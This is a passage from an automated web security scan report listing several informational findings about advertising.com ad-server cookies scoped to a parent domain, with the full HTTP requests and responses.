BASE=x7Q9Yi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3H!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:22:13 GMT; path=/
ROLL=U6APIjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9K!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:22:13 GMT; path=/
22319790=_4dfa49d5,4178647168,768033^702208^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=22319790/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308248530263&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; GUID=MTMwODIyNzEyNzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; C2=Unk+NFJwHob0Fp6sIWwJoaUjtKPCC0nheJpwEg02FaMBdbdhGTwihXoxEwjmGaMBxGehGTAQvaoxEQW4FaMBLpphGTQghXoxEgN5FaMB6ijhGTAmhXoxEAY4FaMBdDmhGTA/yaoxEAVZGaMBYimhGTA3WaoxEQY4FaMBFGehGTAxBaoxEU1aGaMBbTehGTQwBaoxEYnXGaMBWGohGTgQvaoxEogmGaMBxmphGTQRgaoxE0soGaMB8mphGHZAmZOiGmZj0jw+NX0btiGA8MoBl7a+AcsmGUuAEOpxBbLuBoKuGo/smJwokacwzClALRqxBXaxAMdPGVwrQQwdIakhq62ApVmBwD; F1=BQdS63EBAAAABAAAA4AAICA; BASE=x7Q9Xi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixfE!; ROLL=U6APLjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTcL!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.702208.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:22:13 GMT
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 16 Jun 2011 18:22:13 GMT
Content-Length: 994
Connection: close
Set-Cookie: C2=Vnk+NFJwHob0Fp6sIWwJoaUjtKPCC0nheJpwEg02FaMBdbdhGTwihXoxEwjmGaMBxGehGTAQvaoxEQW4FaMBLpphGTQghXoxEgN5FaMB6ijhGTAmhXoxEAY4FaMBdDmhGTA/yaoxEAVZGaMBYimhGTA3WaoxEQY4FaMBFGehGTAxBaoxEU1aGaMBbTehGTQwBaoxEYnXGaMBWGohGTgQvaoxEogmGaMBxmphGTQRgaoxE0soGaMB8mphGHZAmZOiGmZj0jw+NX0btiGA8MoBl7a+AcsmGUuAEOpxBbLuBoKuGo/smJwokacwzClALRqxBXaxAMdPGVwrQQwdIakhq62ApVmBwTqHIUbNGAH; domain=advertising.com; expires=Sat, 15-Jun-2013 18:22:13 GMT; path=/
Set-Cookie: F1=BUdS63EBAAAABAAAA8AAICA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:22:13 GMT; path=/
Set-Cookie: BASE=x7Q9Yi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3H!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:22:13 GMT; path=/
Set-Cookie: ROLL=U6APIjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9K!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:22:13 GMT; path=/
Set-Cookie: 22319790=_4dfa49d5,4178647168,768033^702208^1183^0,0_; domain=advertising.com; path=/click

document.write('<iframe src="http://view.atdmt.com/NDM/iview/140262768/direct/01/4178647168?click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000702208/cstr=22319790=_4dfa49d5,417864
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=33615280/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=HTl+NFJwHob0Fg6sIWwJoawitKPCC0nRcJpwEg02FRMBdbdRETwihXExEwjmGRMBxGeRETAQvaExEQW4FRMBLppRETQghXExEgN5FRMB6ijRETAmhXExEAY4FRMBdDmRETA/yaExEAVZGRMBYimRETA3WaExEQY4FRMBFGeRETAxBaExEU1aGRMBbTeRETQwBaExEYnXGRMBWGoRETgQvaExEogmGRMBxmpRETQRgaExE0soGRMB8mpREHZAmZOiGdZj0jw+NXQbtiGA8Moxi7a+AcsmGLuAEOph/aLuBoKuGf/smJwoka4vzClALRqh/WaxAMdPGMwrQQwdIaAhq62ApVmxtTqHIUbNG3WtrCQIzasIwOICM/oBvdr0IwKvG9G; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
F1=BcMV63EBAAAABAAAAsBA2BA; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
BASE=x7Q9ki23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zuuytsX+/PNnXEVdwP!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
ROLL=U6APUjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/g+cLdnWpK7KosVuHG!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
33615280=_4dfa54c7,4721737206,768033^993430^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=33615280/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308251334943&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; GUID=MTMwODIyNzEyNzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; C2=QOl+NFJwHob0Fh6sIWwJoa0itKPCC0nhcJpwEg02FSMBdbdhETwihXIxEwjmGSMBxGehETAQvaIxEQW4FSMBLpphETQghXIxEgN5FSMB6ijhETAmhXIxEAY4FSMBdDmhETA/yaIxEAVZGSMBYimhETA3WaIxEQY4FSMBFGehETAxBaIxEU1aGSMBbTehETQwBaIxEYnXGSMBWGohETgQvaIxEogmGSMBxmphETQRgaIxE0soGSMB8mphEHZAmZOiGeZj0jw+NXUbtiGA8MoBj7a+AcsmGMuAEOpx/aLuBoKuGg/smJwoka8vzClALRqx/WaxAMdPGNwrQQwdIaEhq62ApVmBuTqHIUbNG4WtrCQIzawIwOICM/oRvdr0IwKvG+G; F1=BA5U63EBAAAABAAAAoBA4BA; BASE=x7Q9ji23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zuuytsX+/P!; ROLL=U6APXjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/g+cLdnWpK!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.993430.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 19:08:55 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 601
Date: Thu, 16 Jun 2011 19:08:55 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=HTl+NFJwHob0Fg6sIWwJoawitKPCC0nRcJpwEg02FRMBdbdRETwihXExEwjmGRMBxGeRETAQvaExEQW4FRMBLppRETQghXExEgN5FRMB6ijRETAmhXExEAY4FRMBdDmRETA/yaExEAVZGRMBYimRETA3WaExEQY4FRMBFGeRETAxBaExEU1aGRMBbTeRETQwBaExEYnXGRMBWGoRETgQvaExEogmGRMBxmpRETQRgaExE0soGRMB8mpREHZAmZOiGdZj0jw+NXQbtiGA8Moxi7a+AcsmGLuAEOph/aLuBoKuGf/smJwoka4vzClALRqh/WaxAMdPGMwrQQwdIaAhq62ApVmxtTqHIUbNG3WtrCQIzasIwOICM/oBvdr0IwKvG9G; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
Set-Cookie: F1=BcMV63EBAAAABAAAAsBA2BA; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
Set-Cookie: BASE=x7Q9ki23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zuuytsX+/PNnXEVdwP!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
Set-Cookie: ROLL=U6APUjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/g+cLdnWpK7KosVuHG!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
Set-Cookie: 33615280=_4dfa54c7,4721737206,768033^993430^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6046.134363.2043285697521/B5118749.4;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnu
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=43472790/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=dik+NFJwHob0Fq6sIWwJoaYjtKPCC0nxeJpwEg02FbMBdbdxGTwihXsxEwjmGbMBxGexGTAQvasxEQW4FbMBLppxGTQghXsxEgN5FbMB6ijxGTAmhXsxEAY4FbMBdDmxGTA/yasxEAVZGbMBYimxGTA3WasxEQY4FbMBFGexGTAxBasxEU1aGbMBbTexGTQwBasxEYnXGbMBWGoxGTgQvasxEogmGbMBxmpxGTQRgasxE0soGbMB8mpxGHZAmZOiGnZj0jw+NX4btiGA8MoRl7a+AcsmGVuAEOpBCbLuBoKuGp/smJwokagwzClALRqBCXaxAMdPGWwrQQwdIaoh; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
F1=B0JS63EBAAAABAAAA0AAKCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
BASE=x7Q9Wi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrE!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
ROLL=U6APKjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6DkcN!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
43472790=_4dfa489d,2003200856,768033^1004438^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=43472790/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308248220548&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; GUID=MTMwODIyNzEyNzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; C2=qdk+NFJwHob0Fr6sIWwJoacjtKPCC0nBfJpwEg02FcMBdbdBHTwihXwxEwjmGcMBxGeBHTAQvawxEQW4FcMBLppBHTQghXwxEgN5FcMB6ijBHTAmhXwxEAY4FcMBdDmBHTA/yawxEAVZGcMBYimBHTA3WawxEQY4FcMBFGeBHTAxBawxEU1aGcMBbTeBHTQwBawxEYnXGcMBWGoBHTgQvawxEogmGcMBxmpBHTQRgawxE0soGcMB8mpBHHZAmZOiGoZj0jw+NX8btiGA8Mohl7a+AcsmGWuAEOpRCbLuBoKuGq/smJwokakwzClALRqRCXaxAMdPGXwrQQwdIash; F1=Bo2R63EBAAAABAAAAwAAMCA; BASE=x7Q9Vi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vI!; ROLL=U6APFjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2O!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1004438.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:17:01 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 641
Date: Thu, 16 Jun 2011 18:17:01 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=dik+NFJwHob0Fq6sIWwJoaYjtKPCC0nxeJpwEg02FbMBdbdxGTwihXsxEwjmGbMBxGexGTAQvasxEQW4FbMBLppxGTQghXsxEgN5FbMB6ijxGTAmhXsxEAY4FbMBdDmxGTA/yasxEAVZGbMBYimxGTA3WasxEQY4FbMBFGexGTAxBasxEU1aGbMBbTexGTQwBasxEYnXGbMBWGoxGTgQvasxEogmGbMBxmpxGTQRgasxE0soGbMB8mpxGHZAmZOiGnZj0jw+NX4btiGA8MoRl7a+AcsmGVuAEOpBCbLuBoKuGp/smJwokagwzClALRqBCXaxAMdPGWwrQQwdIaoh; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
Set-Cookie: F1=B0JS63EBAAAABAAAA0AAKCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
Set-Cookie: BASE=x7Q9Wi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrE!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
Set-Cookie: ROLL=U6APKjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6DkcN!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
Set-Cookie: 43472790=_4dfa489d,2003200856,768033^1004438^1183^0,0_; domain=advertising.com; path=/click

document.write('<script language="JavaScript1.1" src="http://ebay.adnxs.com/ttj?id=472679&cb=2003200856&pt1=0000768033&pt2=0001004438&pt3=1183&imp_id=v2:I:1308248221:2003200856:0000768033:0001004438:1
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=46970102/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=k/k+NFJwHob0Fk6sIWwJoaAjtKPCC0nRdJpwEg02FVMBdbdRFTwihXUxEwjmGVMBxGeRFTAQvaUxEQW4FVMBLppRFTQghXUxEgN5FVMB6ijRFTAmhXUxEAY4FVMBdDmRFTA/yaUxEAVZGVMBYimRFTA3WaUxEQY4FVMBFGeRFTAxBaUxEU1aGVMBbTeRFTQwBaUxEYnXGVMBWGoRFTgQvaUxEogmGVMBxmpRFTQRgaUxE0soGVMB8mpRFHZAmZOiGhZj0jw+NXgbtiGA8Moxj7a+AcsmGPuAEOphAbLuBoKuGj/smJwokaIwzClALRqhAXaxAMdPGQwrQQwdIaQhq62ApVmxuTqHIUbNG7WtrCQIza8IwOICM/oBwB; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
F1=BQ+T63EBAAAABAAAAQBA+BA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
BASE=x7Q9di23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/N!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
ROLL=U6APNjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMP!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
46970102=_4dfa4fe4,1115861440,768033^1029730^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=46970102/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308250083870&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; GUID=MTMwODIyNzEyNzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; C2=u6k+NFJwHob0Fl6sIWwJoaEjtKPCC0nhdJpwEg02FWMBdbdhFTwihXYxEwjmGWMBxGehFTAQvaYxEQW4FWMBLpphFTQghXYxEgN5FWMB6ijhFTAmhXYxEAY4FWMBdDmhFTA/yaYxEAVZGWMBYimhFTA3WaYxEQY4FWMBFGehFTAxBaYxEU1aGWMBbTehFTQwBaYxEYnXGWMBWGohFTgQvaYxEogmGWMBxmphFTQRgaYxE0soGWMB8mphFHZAmZOiGiZj0jw+NXkbtiGA8MoBk7a+AcsmGQuAEOpxAbLuBoKuGk/smJwokaMwzClALRqxAXaxAMdPGRwrQQwdIaUhq62ApVmBvTqHIUbNG8WtrCQIzaAJ; F1=B4qT63EBAAAABAAAAMBAACA; BASE=x7Q9ci23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5KdseJ!; ROLL=U6APMjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotJ!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1029730.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:48:04 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 609
Date: Thu, 16 Jun 2011 18:48:04 GMT
Connection: close
Vary: Accept-Encoding
